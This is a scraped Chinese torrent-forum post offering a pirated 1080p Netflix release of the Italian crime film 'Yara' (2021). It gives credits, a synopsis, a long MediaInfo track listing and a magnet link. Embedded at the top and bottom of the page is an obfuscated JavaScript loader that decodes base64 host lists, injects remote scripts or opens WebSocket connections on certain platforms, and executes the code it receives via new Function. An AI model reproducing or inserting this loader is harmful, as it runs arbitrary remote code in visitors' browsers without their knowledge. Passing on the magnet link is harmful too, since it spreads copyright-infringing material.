谁杀了雅拉[中文字幕].Yara.2021.1080p.NF.WEB-DL.DDP5.1.x264 8.29GB

版主小s 27天前 188

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 谁杀了雅拉

◎片 名 Yara

◎年 代 2021

◎产 地 意大利

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 意大利语

◎上映日期 2021-11-05(意大利)

◎IMDb链接 https://www.imdb.com/title/tt15655276/

◎豆瓣链接 https://movie.douban.com/subject/35619110/

◎片 长 96分钟

◎导 演 马可·图利奥·吉奥达纳 Marco Tullio Giordana (id:1028068)

◎编 剧 Graziano Diana Graziano Diana (id:1006337)

◎演 员 伊莎贝拉·拉贡内瑟 Isabella Ragonese (id:1045302)

阿莱西奥·博尼 Alessio Boni (id:1009615)

罗伯托·齐贝蒂 Roberto Zibetti (id:1165651)

托马斯·特拉巴齐 Thomas Trabacchi (id:1367464)

安德烈亚·布鲁斯基 Andrea Bruschi (id:1072995)

古列尔莫·法维拉 Guglielmo Favilla (id:1386519)

◎标 签 netflix原创电影 / 犯罪 / netflix未看

◎简 介

一名13 岁女孩的失踪案令这个执着的检察官寝食难安,试图尽一切努力查出真相。改编自真实案件。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 308125269313528112675388245908924930760 (0xE7CEC4ADF446CE2D5BD75CB799A41AC8)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.29 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.3 Mb/s

  11. Encoded date : UTC 2021-11-05 09:31:21

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 36 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 675 kb/s

  26. Nominal bit rate : 4 020 kb/s

  27. Maximum bit rate : 6 030 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 24.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.054

  38. Stream size : 1.81 GiB (22%)

  39. Writing library : x264 core 148 r2724 dbe0335

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=4020 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=6030 / vbv_bufsize=8040 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 36 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 442 MiB (5%)

  58. Title : Italian

  59. Language : Italian

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 36 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 442 MiB (5%)

  78. Title : English

  79. Language : English

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 1 h 36 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 442 MiB (5%)

  98. Title : Arabic Syria

  99. Language : Arabic

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 1 h 36 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 442 MiB (5%)

  118. Title : Czech

  119. Language : Czech

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 1 h 36 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 442 MiB (5%)

  138. Title : French

  139. Language : French

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Audio #6

  144. ID : 7

  145. Format : E-AC-3

  146. Format/Info : Enhanced AC-3

  147. Commercial name : Dolby Digital Plus

  148. Codec ID : A_EAC3

  149. Duration : 1 h 36 min

  150. Bit rate mode : Constant

  151. Bit rate : 640 kb/s

  152. Channel(s) : 6 channels

  153. Channel layout : L R C LFE Ls Rs

  154. Sampling rate : 48.0 kHz

  155. Frame rate : 31.250 FPS (1536 SPF)

  156. Compression mode : Lossy

  157. Stream size : 442 MiB (5%)

  158. Title : German

  159. Language : German

  160. Service kind : Complete Main

  161. Default : No

  162. Forced : No


  163. Audio #7

  164. ID : 8

  165. Format : E-AC-3

  166. Format/Info : Enhanced AC-3

  167. Commercial name : Dolby Digital Plus

  168. Codec ID : A_EAC3

  169. Duration : 1 h 36 min

  170. Bit rate mode : Constant

  171. Bit rate : 640 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 442 MiB (5%)

  178. Title : Hindi

  179. Language : Hindi

  180. Service kind : Complete Main

  181. Default : No

  182. Forced : No


  183. Audio #8

  184. ID : 9

  185. Format : E-AC-3

  186. Format/Info : Enhanced AC-3

  187. Commercial name : Dolby Digital Plus

  188. Codec ID : A_EAC3

  189. Duration : 1 h 36 min

  190. Bit rate mode : Constant

  191. Bit rate : 640 kb/s

  192. Channel(s) : 6 channels

  193. Channel layout : L R C LFE Ls Rs

  194. Sampling rate : 48.0 kHz

  195. Frame rate : 31.250 FPS (1536 SPF)

  196. Compression mode : Lossy

  197. Stream size : 442 MiB (5%)

  198. Title : Hungarian

  199. Language : Hungarian

  200. Service kind : Complete Main

  201. Default : No

  202. Forced : No


  203. Audio #9

  204. ID : 10

  205. Format : E-AC-3

  206. Format/Info : Enhanced AC-3

  207. Commercial name : Dolby Digital Plus

  208. Codec ID : A_EAC3

  209. Duration : 1 h 36 min

  210. Bit rate mode : Constant

  211. Bit rate : 640 kb/s

  212. Channel(s) : 6 channels

  213. Channel layout : L R C LFE Ls Rs

  214. Sampling rate : 48.0 kHz

  215. Frame rate : 31.250 FPS (1536 SPF)

  216. Compression mode : Lossy

  217. Stream size : 442 MiB (5%)

  218. Title : Polish

  219. Language : Polish

  220. Service kind : Complete Main

  221. Default : No

  222. Forced : No


  223. Audio #10

  224. ID : 11

  225. Format : E-AC-3

  226. Format/Info : Enhanced AC-3

  227. Commercial name : Dolby Digital Plus

  228. Codec ID : A_EAC3

  229. Duration : 1 h 36 min

  230. Bit rate mode : Constant

  231. Bit rate : 640 kb/s

  232. Channel(s) : 6 channels

  233. Channel layout : L R C LFE Ls Rs

  234. Sampling rate : 48.0 kHz

  235. Frame rate : 31.250 FPS (1536 SPF)

  236. Compression mode : Lossy

  237. Stream size : 442 MiB (5%)

  238. Title : Brazilian Portuguese

  239. Language : Portuguese

  240. Service kind : Complete Main

  241. Default : No

  242. Forced : No


  243. Audio #11

  244. ID : 12

  245. Format : E-AC-3

  246. Format/Info : Enhanced AC-3

  247. Commercial name : Dolby Digital Plus

  248. Codec ID : A_EAC3

  249. Duration : 1 h 36 min

  250. Bit rate mode : Constant

  251. Bit rate : 640 kb/s

  252. Channel(s) : 6 channels

  253. Channel layout : L R C LFE Ls Rs

  254. Sampling rate : 48.0 kHz

  255. Frame rate : 31.250 FPS (1536 SPF)

  256. Compression mode : Lossy

  257. Stream size : 442 MiB (5%)

  258. Title : Russian

  259. Language : Russian

  260. Service kind : Complete Main

  261. Default : No

  262. Forced : No


  263. Audio #12

  264. ID : 13

  265. Format : E-AC-3

  266. Format/Info : Enhanced AC-3

  267. Commercial name : Dolby Digital Plus

  268. Codec ID : A_EAC3

  269. Duration : 1 h 36 min

  270. Bit rate mode : Constant

  271. Bit rate : 640 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 442 MiB (5%)

  278. Title : Spanish

  279. Language : Spanish

  280. Service kind : Complete Main

  281. Default : No

  282. Forced : No


  283. Audio #13

  284. ID : 14

  285. Format : E-AC-3

  286. Format/Info : Enhanced AC-3

  287. Commercial name : Dolby Digital Plus

  288. Codec ID : A_EAC3

  289. Duration : 1 h 36 min

  290. Bit rate mode : Constant

  291. Bit rate : 640 kb/s

  292. Channel(s) : 6 channels

  293. Channel layout : L R C LFE Ls Rs

  294. Sampling rate : 48.0 kHz

  295. Frame rate : 31.250 FPS (1536 SPF)

  296. Compression mode : Lossy

  297. Stream size : 442 MiB (5%)

  298. Title : European Spanish

  299. Language : Spanish

  300. Service kind : Complete Main

  301. Default : No

  302. Forced : No


  303. Audio #14

  304. ID : 15

  305. Format : E-AC-3

  306. Format/Info : Enhanced AC-3

  307. Commercial name : Dolby Digital Plus

  308. Codec ID : A_EAC3

  309. Duration : 1 h 36 min

  310. Bit rate mode : Constant

  311. Bit rate : 640 kb/s

  312. Channel(s) : 6 channels

  313. Channel layout : L R C LFE Ls Rs

  314. Sampling rate : 48.0 kHz

  315. Frame rate : 31.250 FPS (1536 SPF)

  316. Compression mode : Lossy

  317. Stream size : 442 MiB (5%)

  318. Title : Thai

  319. Language : Thai

  320. Service kind : Complete Main

  321. Default : No

  322. Forced : No


  323. Audio #15

  324. ID : 16

  325. Format : E-AC-3

  326. Format/Info : Enhanced AC-3

  327. Commercial name : Dolby Digital Plus

  328. Codec ID : A_EAC3

  329. Duration : 1 h 36 min

  330. Bit rate mode : Constant

  331. Bit rate : 640 kb/s

  332. Channel(s) : 6 channels

  333. Channel layout : L R C LFE Ls Rs

  334. Sampling rate : 48.0 kHz

  335. Frame rate : 31.250 FPS (1536 SPF)

  336. Compression mode : Lossy

  337. Stream size : 442 MiB (5%)

  338. Title : Turkish

  339. Language : Turkish

  340. Service kind : Complete Main

  341. Default : No

  342. Forced : No


  343. Text #1

  344. ID : 17

  345. Format : UTF-8

  346. Codec ID : S_TEXT/UTF8

  347. Codec ID/Info : UTF-8 Plain Text

  348. Duration : 1 h 33 min

  349. Bit rate : 69 b/s

  350. Count of elements : 1283

  351. Stream size : 47.6 KiB (0%)

  352. Title : English

  353. Language : English

  354. Default : Yes

  355. Forced : No


  356. Text #2

  357. ID : 18

  358. Format : UTF-8

  359. Codec ID : S_TEXT/UTF8

  360. Codec ID/Info : UTF-8 Plain Text

  361. Duration : 1 h 34 min

  362. Bit rate : 115 b/s

  363. Count of elements : 1283

  364. Stream size : 79.8 KiB (0%)

  365. Title : Arabic

  366. Language : Arabic

  367. Default : No

  368. Forced : No


  369. Text #3

  370. ID : 19

  371. Format : UTF-8

  372. Codec ID : S_TEXT/UTF8

  373. Codec ID/Info : UTF-8 Plain Text

  374. Duration : 1 h 34 min

  375. Bit rate : 69 b/s

  376. Count of elements : 1283

  377. Stream size : 47.9 KiB (0%)

  378. Title : Chinese Simplified

  379. Language : Chinese

  380. Default : No

  381. Forced : No


  382. Text #4

  383. ID : 20

  384. Format : UTF-8

  385. Codec ID : S_TEXT/UTF8

  386. Codec ID/Info : UTF-8 Plain Text

  387. Duration : 1 h 34 min

  388. Bit rate : 63 b/s

  389. Count of elements : 1268

  390. Stream size : 43.6 KiB (0%)

  391. Title : Chinese Traditional

  392. Language : Chinese

  393. Default : No

  394. Forced : No


  395. Text #5

  396. ID : 21

  397. Format : UTF-8

  398. Codec ID : S_TEXT/UTF8

  399. Codec ID/Info : UTF-8 Plain Text

  400. Duration : 1 h 33 min

  401. Bit rate : 62 b/s

  402. Count of elements : 1174

  403. Stream size : 42.9 KiB (0%)

  404. Title : Croatian

  405. Language : Croatian

  406. Default : No

  407. Forced : No


  408. Text #6

  409. ID : 22

  410. Format : UTF-8

  411. Codec ID : S_TEXT/UTF8

  412. Codec ID/Info : UTF-8 Plain Text

  413. Duration : 1 h 30 min

  414. Bit rate : 64 b/s

  415. Count of elements : 1067

  416. Stream size : 42.7 KiB (0%)

  417. Title : Czech

  418. Language : Czech

  419. Default : No

  420. Forced : No


  421. Text #7

  422. ID : 23

  423. Format : UTF-8

  424. Codec ID : S_TEXT/UTF8

  425. Codec ID/Info : UTF-8 Plain Text

  426. Duration : 1 h 34 min

  427. Bit rate : 64 b/s

  428. Count of elements : 1141

  429. Stream size : 44.6 KiB (0%)

  430. Title : Danish

  431. Language : Danish

  432. Default : No

  433. Forced : No


  434. Text #8

  435. ID : 24

  436. Format : UTF-8

  437. Codec ID : S_TEXT/UTF8

  438. Codec ID/Info : UTF-8 Plain Text

  439. Duration : 1 h 34 min

  440. Bit rate : 64 b/s

  441. Count of elements : 1125

  442. Stream size : 44.5 KiB (0%)

  443. Title : Dutch

  444. Language : Dutch

  445. Default : No

  446. Forced : No


  447. Text #9

  448. ID : 25

  449. Format : UTF-8

  450. Codec ID : S_TEXT/UTF8

  451. Codec ID/Info : UTF-8 Plain Text

  452. Duration : 1 h 34 min

  453. Bit rate : 68 b/s

  454. Count of elements : 1226

  455. Stream size : 47.3 KiB (0%)

  456. Title : Finnish

  457. Language : Finnish

  458. Default : No

  459. Forced : No


  460. Text #10

  461. ID : 26

  462. Format : UTF-8

  463. Codec ID : S_TEXT/UTF8

  464. Codec ID/Info : UTF-8 Plain Text

  465. Duration : 1 h 34 min

  466. Bit rate : 72 b/s

  467. Count of elements : 1245

  468. Stream size : 49.8 KiB (0%)

  469. Title : French

  470. Language : French

  471. Default : No

  472. Forced : No


  473. Text #11

  474. ID : 27

  475. Format : UTF-8

  476. Codec ID : S_TEXT/UTF8

  477. Codec ID/Info : UTF-8 Plain Text

  478. Duration : 1 h 30 min

  479. Bit rate : 71 b/s

  480. Count of elements : 1181

  481. Stream size : 46.9 KiB (0%)

  482. Title : German

  483. Language : German

  484. Default : No

  485. Forced : No


  486. Text #12

  487. ID : 28

  488. Format : UTF-8

  489. Codec ID : S_TEXT/UTF8

  490. Codec ID/Info : UTF-8 Plain Text

  491. Duration : 1 h 33 min

  492. Bit rate : 113 b/s

  493. Count of elements : 1293

  494. Stream size : 78.3 KiB (0%)

  495. Title : Greek

  496. Language : Greek

  497. Default : No

  498. Forced : No


  499. Text #13

  500. ID : 29

  501. Format : UTF-8

  502. Codec ID : S_TEXT/UTF8

  503. Codec ID/Info : UTF-8 Plain Text

  504. Duration : 1 h 34 min

  505. Bit rate : 101 b/s

  506. Count of elements : 1282

  507. Stream size : 70.1 KiB (0%)

  508. Title : Hebrew

  509. Language : Hebrew

  510. Default : No

  511. Forced : No


  512. Text #14

  513. ID : 30

  514. Format : UTF-8

  515. Codec ID : S_TEXT/UTF8

  516. Codec ID/Info : UTF-8 Plain Text

  517. Duration : 1 h 34 min

  518. Bit rate : 73 b/s

  519. Count of elements : 1281

  520. Stream size : 50.9 KiB (0%)

  521. Title : Hungarian

  522. Language : Hungarian

  523. Default : No

  524. Forced : No


  525. Text #15

  526. ID : 31

  527. Format : UTF-8

  528. Codec ID : S_TEXT/UTF8

  529. Codec ID/Info : UTF-8 Plain Text

  530. Duration : 1 h 34 min

  531. Bit rate : 67 b/s

  532. Count of elements : 1273

  533. Stream size : 46.7 KiB (0%)

  534. Title : Indonesian

  535. Language : Indonesian

  536. Default : No

  537. Forced : No


  538. Text #16

  539. ID : 32

  540. Format : UTF-8

  541. Codec ID : S_TEXT/UTF8

  542. Codec ID/Info : UTF-8 Plain Text

  543. Duration : 1 h 28 min

  544. Bit rate : 103 b/s

  545. Count of elements : 1435

  546. Stream size : 67.4 KiB (0%)

  547. Title : Italian

  548. Language : Italian

  549. Default : No

  550. Forced : No


  551. Text #17

  552. ID : 33

  553. Format : UTF-8

  554. Codec ID : S_TEXT/UTF8

  555. Codec ID/Info : UTF-8 Plain Text

  556. Duration : 1 h 34 min

  557. Bit rate : 63 b/s

  558. Count of elements : 1294

  559. Stream size : 43.6 KiB (0%)

  560. Title : Japanese

  561. Language : Japanese

  562. Default : No

  563. Forced : No


  564. Text #18

  565. ID : 34

  566. Format : UTF-8

  567. Codec ID : S_TEXT/UTF8

  568. Codec ID/Info : UTF-8 Plain Text

  569. Duration : 1 h 34 min

  570. Bit rate : 84 b/s

  571. Count of elements : 1292

  572. Stream size : 58.2 KiB (0%)

  573. Title : Korean

  574. Language : Korean

  575. Default : No

  576. Forced : No


  577. Text #19

  578. ID : 35

  579. Format : UTF-8

  580. Codec ID : S_TEXT/UTF8

  581. Codec ID/Info : UTF-8 Plain Text

  582. Duration : 1 h 34 min

  583. Bit rate : 65 b/s

  584. Count of elements : 1263

  585. Stream size : 45.4 KiB (0%)

  586. Title : Malay

  587. Language : Malay

  588. Default : No

  589. Forced : No


  590. Text #20

  591. ID : 36

  592. Format : UTF-8

  593. Codec ID : S_TEXT/UTF8

  594. Codec ID/Info : UTF-8 Plain Text

  595. Duration : 1 h 34 min

  596. Bit rate : 63 b/s

  597. Count of elements : 1181

  598. Stream size : 43.7 KiB (0%)

  599. Title : Norwegian Bokmal

  600. Language : Norwegian Bokmal

  601. Default : No

  602. Forced : No


  603. Text #21

  604. ID : 37

  605. Format : UTF-8

  606. Codec ID : S_TEXT/UTF8

  607. Codec ID/Info : UTF-8 Plain Text

  608. Duration : 1 h 34 min

  609. Bit rate : 65 b/s

  610. Count of elements : 1254

  611. Stream size : 45.4 KiB (0%)

  612. Title : Polish

  613. Language : Polish

  614. Default : No

  615. Forced : No


  616. Text #22

  617. ID : 38

  618. Format : UTF-8

  619. Codec ID : S_TEXT/UTF8

  620. Codec ID/Info : UTF-8 Plain Text

  621. Duration : 1 h 34 min

  622. Bit rate : 66 b/s

  623. Count of elements : 1282

  624. Stream size : 45.8 KiB (0%)

  625. Title : Portuguese

  626. Language : Portuguese

  627. Default : No

  628. Forced : No


  629. Text #23

  630. ID : 39

  631. Format : UTF-8

  632. Codec ID : S_TEXT/UTF8

  633. Codec ID/Info : UTF-8 Plain Text

  634. Duration : 1 h 34 min

  635. Bit rate : 68 b/s

  636. Count of elements : 1239

  637. Stream size : 47.4 KiB (0%)

  638. Title : Brazilian Portuguese

  639. Language : Portuguese

  640. Default : No

  641. Forced : No


  642. Text #24

  643. ID : 40

  644. Format : UTF-8

  645. Codec ID : S_TEXT/UTF8

  646. Codec ID/Info : UTF-8 Plain Text

  647. Duration : 1 h 34 min

  648. Bit rate : 77 b/s

  649. Count of elements : 1270

  650. Stream size : 53.1 KiB (0%)

  651. Title : Romanian

  652. Language : Romanian

  653. Default : No

  654. Forced : No


  655. Text #25

  656. ID : 41

  657. Format : UTF-8

  658. Codec ID : S_TEXT/UTF8

  659. Codec ID/Info : UTF-8 Plain Text

  660. Duration : 1 h 34 min

  661. Bit rate : 111 b/s

  662. Count of elements : 1274

  663. Stream size : 76.6 KiB (0%)

  664. Title : Russian

  665. Language : Russian

  666. Default : No

  667. Forced : No


  668. Text #26

  669. ID : 42

  670. Format : UTF-8

  671. Codec ID : S_TEXT/UTF8

  672. Codec ID/Info : UTF-8 Plain Text

  673. Duration : 1 h 33 min

  674. Bit rate : 66 b/s

  675. Count of elements : 1272

  676. Stream size : 45.7 KiB (0%)

  677. Title : Spanish

  678. Language : Spanish

  679. Default : No

  680. Forced : No


  681. Text #27

  682. ID : 43

  683. Format : UTF-8

  684. Codec ID : S_TEXT/UTF8

  685. Codec ID/Info : UTF-8 Plain Text

  686. Duration : 1 h 34 min

  687. Bit rate : 62 b/s

  688. Count of elements : 1256

  689. Stream size : 43.3 KiB (0%)

  690. Title : European Spanish

  691. Language : Spanish

  692. Default : No

  693. Forced : No


  694. Text #28

  695. ID : 44

  696. Format : UTF-8

  697. Codec ID : S_TEXT/UTF8

  698. Codec ID/Info : UTF-8 Plain Text

  699. Duration : 1 h 34 min

  700. Bit rate : 67 b/s

  701. Count of elements : 1281

  702. Stream size : 46.5 KiB (0%)

  703. Title : Swedish

  704. Language : Swedish

  705. Default : No

  706. Forced : No


  707. Text #29

  708. ID : 45

  709. Format : UTF-8

  710. Codec ID : S_TEXT/UTF8

  711. Codec ID/Info : UTF-8 Plain Text

  712. Duration : 1 h 34 min

  713. Bit rate : 165 b/s

  714. Count of elements : 1285

  715. Stream size : 114 KiB (0%)

  716. Title : Thai

  717. Language : Thai

  718. Default : No

  719. Forced : No


  720. Text #30

  721. ID : 46

  722. Format : UTF-8

  723. Codec ID : S_TEXT/UTF8

  724. Codec ID/Info : UTF-8 Plain Text

  725. Duration : 1 h 34 min

  726. Bit rate : 67 b/s

  727. Count of elements : 1226

  728. Stream size : 46.8 KiB (0%)

  729. Title : Turkish

  730. Language : Turkish

  731. Default : No

  732. Forced : No


  733. Text #31

  734. ID : 47

  735. Format : UTF-8

  736. Codec ID : S_TEXT/UTF8

  737. Codec ID/Info : UTF-8 Plain Text

  738. Duration : 1 h 34 min

  739. Bit rate : 108 b/s

  740. Count of elements : 1257

  741. Stream size : 75.0 KiB (0%)

  742. Title : Ukrainian

  743. Language : Ukrainian

  744. Default : No

  745. Forced : No


  746. Text #32

  747. ID : 48

  748. Format : UTF-8

  749. Codec ID : S_TEXT/UTF8

  750. Codec ID/Info : UTF-8 Plain Text

  751. Duration : 1 h 34 min

  752. Bit rate : 90 b/s

  753. Count of elements : 1137

  754. Stream size : 62.7 KiB (0%)

  755. Title : Vietnamese

  756. Language : Vietnamese

  757. Default : No

  758. Forced : No




复制代码


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:D7790C71B83414D67B498A88DFA9A74A3D1B4807

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};